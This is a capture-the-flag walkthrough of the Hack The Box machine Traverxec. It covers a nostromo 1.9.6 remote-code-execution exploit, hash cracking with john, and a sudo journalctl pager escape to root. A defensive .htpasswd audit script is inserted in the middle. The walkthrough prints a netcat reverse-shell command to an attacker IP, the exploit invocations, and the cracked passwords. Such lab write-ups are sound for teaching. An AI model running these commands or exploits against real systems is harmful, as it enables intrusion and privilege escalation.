Hack The Box: Traverxec


Enumeration


nmap reveals 2 open ports: 22 and 80.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 shows a website:



Initial Foothold

The web server is nostromo 1.9.6, and a quick Google search reveals that it suffers from an RCE vulnerability. There is an exploit Python script in the searchsploit database, so I used it and immediately got a response:

$ python2.7 ./47837.py 10.129.203.206 80 id
HTTP/1.1 200 OK
Date: Thu, 10 Nov 2022 21:27:05 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting a reverse shell failed for me, but after a quick enumeration I found what looked like the password hash for user david in the .htpasswd file:


$ python2.7 ./47837.py 10.129.203.206 80 "cat /var/nostromo/conf/.htpasswd"
HTTP/1.1 200 OK
Date: Thu, 10 Nov 2022 21:31:16 GMT
Server: nostromo 1.9.6
Connection: close


david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

After some googling, I found out that this could be an extract from /etc/shadow. So I downloaded /etc/passwd as well and combined them:

$ unshadow passwd shadow > david_pw
$ john --wordlist=/usr/share/wordlists/rockyou.txt david_pw

And with this I got the password: Nowonly4me. Unfortunately this password didn’t work for an SSH login as user david, so let’s try to get a proper shell as www-data first.
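The md5crypt ($1$) hash above fell to john and a wordlist within seconds. As an added example that is not part of the writeup, here is a small Python auditor that parses a .htpasswd file and flags entries still stored with legacy hash schemes; the scheme list and verdicts are my own assumptions, not anything nostromo ships.

```python
import re
from typing import List, NamedTuple, Tuple

# Hash-scheme prefixes found in .htpasswd files, mapped to an offline-cracking verdict.
# Assumption (added example): the verdicts are general guidance, not a nostromo policy.
SCHEMES: List[Tuple[str, str, str]] = [
    (r"^\$2[aby]\$\d\d\$", "bcrypt", "ok"),
    (r"^\$apr1\$", "apr1 (Apache MD5)", "weak"),
    (r"^\$1\$", "md5crypt", "weak"),
    (r"^\{SHA\}", "unsalted SHA-1", "weak"),
    (r"^[./0-9A-Za-z]{13}$", "DES crypt", "weak"),
]

class Entry(NamedTuple):
    user: str
    scheme: str
    verdict: str

def classify_hash(hashval: str) -> Tuple[str, str]:
    """Return (scheme name, verdict) for one password field."""
    for pattern, name, verdict in SCHEMES:
        if re.match(pattern, hashval):
            return name, verdict
    return "unknown", "review"

def audit_htpasswd(text: str) -> List[Entry]:
    """Parse .htpasswd content; blank lines and comments are skipped,
    a line without a ':' separator is rejected instead of silently ignored."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"line {lineno}: malformed entry, no ':' separator")
        user, hashval = line.split(":", 1)
        scheme, verdict = classify_hash(hashval)
        entries.append(Entry(user, scheme, verdict))
    return entries

# Constructed sample: first entry is the hash format seen on the box,
# second is a bcrypt-shaped placeholder (not a real hash).
SAMPLE = """\
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
ops:$2y$10$PLACEHOLDERSALTPLACEHOLDERSALTPLACEHOLDERHASHPLACEHOLDERX
"""
if __name__ == "__main__":
    for e in audit_htpasswd(SAMPLE):
        print(f"{e.user:10s} {e.scheme:20s} {e.verdict}")
```

Run it against a real /var/nostromo/conf/.htpasswd to see which accounts would need a rehash (with htpasswd -B, for example) before a leaked file turns into cracked credentials.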

$ python2.7 ./47837.py 10.129.203.206 80 "/usr/bin/nc -e /bin/sh 10.10.14.31 443"

gets us a reverse shell on port 443.


At this point, I got stuck because I couldn’t find a way to use the password for user david, and there was no other foothold either. So I searched for some writeups and found out that I didn’t understand what the nostromo server is doing. This is what it says in the config file:

# HOMEDIRS [OPTIONAL]
homedirs                /home
homedirs_public         public_www

This is because nostromo offers the option to publish the public_www directory of a user’s home folder online. From the nostromo documentation:

HOMEDIRS
To serve the home directories of your users via HTTP, enable the homedirs option by defining the path in where the home directories are stored, normally /home. To access a users home directory enter a ~ in the URL followed by the home directory name like in this example:

http://www.nazgul.ch/~hacki/

The content of the home directory is handled exactly the same way as a directory in your document root. If some users don't want that their home directory can be accessed via HTTP, they shall remove the world readable flag on their home directory and a caller will receive a 403 Forbidden response. Also, if basic authentication is enabled, a user can create an .htaccess file in his home directory and a caller will need to authenticate.

You can restrict the access within the home directories to a single sub directory by defining it via the homedirs_public option.

I tried to access the home directory at <ip>/~/david but it was empty:


So I checked the writeup again and finally got back on track: with this, the user www-data might also have read permissions on /home/david/public_www. And this is really the case - inside the directory we can find a zip file with a password-protected SSH key. Cracking its password with john reveals the password hunter, and with this we can log in via SSH and get the user flag.


Privilege Escalation

Inside David’s home folder, we can find a script called server-status.sh which can be executed without a sudo password, although the last line requires sudo permissions:

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

So it seems the user has sudo permissions for this command without a password. With the help of GTFOBins, we can try to modify the script in order to pop a shell for us. Unfortunately it is not possible to edit the file.

So I had to consult the walkthrough again, but actually it’s not so difficult: we can execute the command $ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service even outside the context of the script. According to GTFOBins, we can break out of journalctl as long as it’s in the context of the pager (most likely less). So when you shrink the terminal size to less than five lines, the output goes through the pager, and from there you can break out of the user context and get a root shell with !/bin/sh.
